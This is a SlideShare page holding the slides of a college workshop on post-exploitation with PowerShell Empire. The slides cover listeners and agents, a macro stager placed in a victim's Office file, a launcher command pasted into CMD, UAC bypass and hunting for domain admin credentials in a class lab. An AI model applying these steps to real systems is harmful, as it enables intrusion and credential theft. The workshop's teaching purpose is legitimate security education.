SlideShare a Scribd company logo

Empire Work shop

Haydn Johnson
Haydn Johnson

This was part of a 3 hour talk for students at a local college. Introductipn to post exploitation with PowerShell Empire. Feel free to use and learn from.

1 of 27
Download to read offline
@haydnjohnson “Building an Empire” PowerShell Goodness http://www.slideshare.net/harmj0y/building-an-empire-with-powershell 1
@haydnjohnson Post Exploitation ● Have gained access a. Via phishing b. Via Exploit c. Via ?? ● Want to know where we are in the network ● Want to know WHO we are ● What PERMISSIONS do we have ● Getting a shell is just the beginning :) 2
@haydnjohnson So you have gained access - Now what ● What Box are you on? ○ IP address ○ What platform? ○ Service Pack? ● Normal User or Privileged User? ○ What permissions ○ What can you execute ● What else is out in the Abyss? ○ Network shares ○ Other boxes ○ Where are the domain admins?? 3
@haydnjohnson Any other things we might want to know ??? 4
@haydnjohnson We want to pilfer - quietly as possible ● As small a footprint as possible ● Use native tools ● A scripting language like bash for windows? ● BATCH any good? 5
@haydnjohnson PowerShell - our best friend ● It is native - pretty much guaranteed to be available ● Full .NET access ● Most likely to be whitelisted ● Access to Win32 API ○ Access to Kernel ● Run things in memory! ○ Even assemble binaries For an amazing explanation read: http://www.exploit-monday.com/2012/08/Why-I-Choose-PowerShell.html 6
@haydnjohnson Empire comes to the rescue Free open source Power-packed! 7
@haydnjohnson Incorporates: ● PowerSploit ● Posh-SecMod ● PowerShell-AD-Recon ● Mimikatz Developers: ● @harmj0y ● @enigma0x3 ● Many others! 8
@haydnjohnson References http://www.powershellempire.com/ Peeps to follow: ● https://twitter.com/enigma0x3 ● https://twitter.com/harmj0y ● https://twitter.com/mattifestation ● https://twitter.com/obscuresec ● https://twitter.com/JosephBialek ● https://twitter.com/pyrotek3 ● https://twitter.com/tifkin_ ● https://twitter.com/ben0xa ● https://twitter.com/mwjcomputing ● https://github.com/leechristensen/UnmanagedPowerShell ● https://github.com/PyroTek3/PowerShell-AD-Recon ● https://github.com/darkoperator/Posh-SecMod Many more + 9
@haydnjohnson Pocketful of goodies! ● Create Listeners easily ○ PowerShell command straight into CMD ○ VBA for excel Macros ○ Ducky scripts ● Agents (C2 comms) are easy to use ● Modules and more modules! 10
@haydnjohnson Listeners Communicates with your agent (the thing that sits on your victim's machine) 11
@haydnjohnson 12
@haydnjohnson Agents ● Are what you tell to do things on your victim's machine! ● Similar to a meterpreter session? More powerful maybe? 13
@haydnjohnson 14
@haydnjohnson Modules ● Numerous scripts with awesomeness ● Run situational awareness scripts ● Run Privilege escalation scripts 15
@haydnjohnson 16
@haydnjohnson No more theory. Let's give this a try. 17
@haydnjohnson The plan 1. Install PowerShell Empire 2. Create a listener 3. Execute an Agent on Victim 4. Run modules 5. Escalate to high privileged process as Admin (bypassuac) 6. Look for other shares/boxes to get Domain Admin a. If classes infrastructure has AD 18
@haydnjohnson Tutorial to Follow Part 1 - Getting Access https://www.cybrary.it/0p3n/powershell-empire-stagers-1-phishing-office-macro- evading-avs/ ● Covers Installation ● Receiving connection via a VBA Macro 19
@haydnjohnson Install Empire Git Clone onto your Linux machine Got Kali? 20
@haydnjohnson Create a Listener “listeners” - switch to listeners mode “options” | “info” - view options to configure “set Name Test1” - Set a name for listener “execute” - activates the listener 21
@haydnjohnson Create a macro “usestager macro Test” - create macro for the listener named Test “options” - ensure listener is connected “execute” - will create a file with VBA code Add code from Macro into Victims Excel/Word document. Execute file and receive agent If no excel/word use “usestager launcher”, copy and paste into CMD 22
@haydnjohnson Have now gained access 23
@haydnjohnson Tutorial To Follow Part 2 - Controlling your agent https://www.cybrary.it/0p3n/powershell-empire-stagers-2-controlling-victims- machine/ Opened file - should have an agent “agents” - will take you to the listing of agents “interact ABCDEDINDF” - select the agent to interact with. “sysinfo” - gain information about your victim “usemodule” <tab> - gain a list of all the awesomeness 24
@haydnjohnson Useful commands ● >Git clone https://github.com/PowerShellEmpire/Empire.git ● >Listeners ○ List & create listeners ● >Usestager launcher ○ Usestager <tab> to see other launchers :) ● >Agents ○ >sysinfo - list system info agent is on ● >usemodule <tab> ● Bypassuac <2nd listener> 25
@haydnjohnson Goals Find a flag - you have local admin access, there is a flag on an open share. Find it Get Domain Admin credentials - you may need to ‘hunt’ for a domain admin 26
@haydnjohnson Any other fun stuff we can do? Detailed case study: https://enigma0x3.net/2016/01/28/an- empire-case-study/ 27

Recommended

Purple View
Purple ViewPurple View
Purple View
Haydn Johnson
 
Bsides to 2016-penetration-testing
Bsides to 2016-penetration-testingBsides to 2016-penetration-testing
Bsides to 2016-penetration-testing
Haydn Johnson
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Chris Gates
 
Power your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expertPower your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expert
ShivamSharma909
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Mazin Ahmed
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Drupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidentsDrupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidents
sydneydrupal
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 

Recommended

Purple View
Purple ViewPurple View
Purple View
Haydn Johnson
 
Bsides to 2016-penetration-testing
Bsides to 2016-penetration-testingBsides to 2016-penetration-testing
Bsides to 2016-penetration-testing
Haydn Johnson
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Chris Gates
 
Power your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expertPower your way to becoming a red team cyber security expert
Power your way to becoming a red team cyber security expert
ShivamSharma909
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Mazin Ahmed
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Drupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidentsDrupal, lessons learnt from real world security incidents
Drupal, lessons learnt from real world security incidents
sydneydrupal
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
Yaroslav Babin
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Abraham Aranguren
 
Nolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonNolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnson
Haydn Johnson
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
EC-Council
 
Putting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps ToolchainPutting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps Toolchain
James Wickett
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
Rob Fuller
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
How to do well in Bug bounty programs. Presentation at @nullhyd by AbhijethHow to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
Abhijeth D
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
Filip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawlerFilip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawler
Marketing Festival
 
Building Twitter's SDKs for Android
Building Twitter's SDKs for AndroidBuilding Twitter's SDKs for Android
Building Twitter's SDKs for Android
Andy Piper
 
Rand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Rand Fishkin - The Invisible Giant that Mucks Up Our MarketingRand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Rand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Marketing Festival
 
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspective
SecuRing
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
Shahee Mirza
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
Shubham Gupta
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
Continuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecurityContinuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves Security
Sonatype
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
Sonatype
 
Purple View
Purple ViewPurple View
Purple View
Haydn Johnson
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration Testing
Haydn Johnson
 

More Related Content

What's hot

XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
Yaroslav Babin
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Abraham Aranguren
 
Nolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonNolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnson
Haydn Johnson
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
EC-Council
 
Putting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps ToolchainPutting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps Toolchain
James Wickett
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
Rob Fuller
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
How to do well in Bug bounty programs. Presentation at @nullhyd by AbhijethHow to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
Abhijeth D
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
Filip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawlerFilip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawler
Marketing Festival
 
Building Twitter's SDKs for Android
Building Twitter's SDKs for AndroidBuilding Twitter's SDKs for Android
Building Twitter's SDKs for Android
Andy Piper
 
Rand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Rand Fishkin - The Invisible Giant that Mucks Up Our MarketingRand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Rand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Marketing Festival
 
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspective
SecuRing
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
Shahee Mirza
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
Shubham Gupta
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
Continuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecurityContinuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves Security
Sonatype
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
Sonatype
 

What's hot (20)

XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
 
Nolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonNolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnson
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 
Putting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps ToolchainPutting Rugged Into your DevOps Toolchain
Putting Rugged Into your DevOps Toolchain
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
How to do well in Bug bounty programs. Presentation at @nullhyd by AbhijethHow to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
Filip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawlerFilip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawler
 
Building Twitter's SDKs for Android
Building Twitter's SDKs for AndroidBuilding Twitter's SDKs for Android
Building Twitter's SDKs for Android
 
Rand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Rand Fishkin - The Invisible Giant that Mucks Up Our MarketingRand Fishkin - The Invisible Giant that Mucks Up Our Marketing
Rand Fishkin - The Invisible Giant that Mucks Up Our Marketing
 
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspective
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
 
Logs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thiefLogs, Logs, Logs - What you need to know to catch a thief
Logs, Logs, Logs - What you need to know to catch a thief
 
Continuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves SecurityContinuous Security: 5 Ways DevOps Improves Security
Continuous Security: 5 Ways DevOps Improves Security
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
 

Viewers also liked

Purple View
Purple ViewPurple View
Purple View
Haydn Johnson
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration Testing
Haydn Johnson
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
Haydn Johnson
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016
Haydn Johnson
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Denim Group
 
Security by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue TeamsSecurity by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue Teams
AlienVault
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
Chris Gates
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
beltface
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
Chris Gates
 
Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
Haydn Johnson
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 

Viewers also liked (11)

Purple View
Purple ViewPurple View
Purple View
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration Testing
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
 
Security by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue TeamsSecurity by Collaboration: Rethinking Red Teams versus Blue Teams
Security by Collaboration: Rethinking Red Teams versus Blue Teams
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 

Similar to Empire Work shop

The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...
The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...
The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...
Tom Limoncelli
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
Will Schroeder
 
Pentester++
Pentester++Pentester++
Pentester++
CTruncer
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
CTruncer
 
Accessblockedsites
AccessblockedsitesAccessblockedsites
Accessblockedsites
Ashok kumar sandhyala
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
Esteban Bedoya
 
HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)
Phillip Maddux
 
Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,
Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,
Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,
Sigma Software
 
Learn awesome hacking tricks
Learn awesome hacking tricksLearn awesome hacking tricks
Learn awesome hacking tricks
Sudhanshu Mishra
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
Will Schroeder
 
Manual de autodefensa digital (INGLÉS)
Manual de autodefensa digital (INGLÉS)Manual de autodefensa digital (INGLÉS)
Manual de autodefensa digital (INGLÉS)
Stéphane M. Grueso
 
GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day September 2007GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day September 2007
guest20ab09
 
Software Instructions
Software InstructionsSoftware Instructions
Software Instructions
Anastasia Khudoyarova
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing Development
CTruncer
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
Manish Mudhliyar
 
Building Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and PaillierBuilding Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and Paillier
Nicholas Doiron
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
jasonhaddix
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
 

Similar to Empire Work shop (20)

The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...
The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...
The BlackBox Project: Safely store secrets in Git/Mercurial (originally for P...
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
Pentester++
Pentester++Pentester++
Pentester++
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
 
Accessblockedsites
AccessblockedsitesAccessblockedsites
Accessblockedsites
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
 
HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)
 
Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,
Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,
Байки із пожежного депо або як працює Big Data в Sigma Software, Денис Пишьєв,
 
Learn awesome hacking tricks
Learn awesome hacking tricksLearn awesome hacking tricks
Learn awesome hacking tricks
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Manual de autodefensa digital (INGLÉS)
Manual de autodefensa digital (INGLÉS)Manual de autodefensa digital (INGLÉS)
Manual de autodefensa digital (INGLÉS)
 
GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day September 2007GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day September 2007
 
Software Instructions
Software InstructionsSoftware Instructions
Software Instructions
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing Development
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Building Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and PaillierBuilding Encrypted APIs with HTTPS and Paillier
Building Encrypted APIs with HTTPS and Paillier
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Ransomware - what is it, how to protect against it
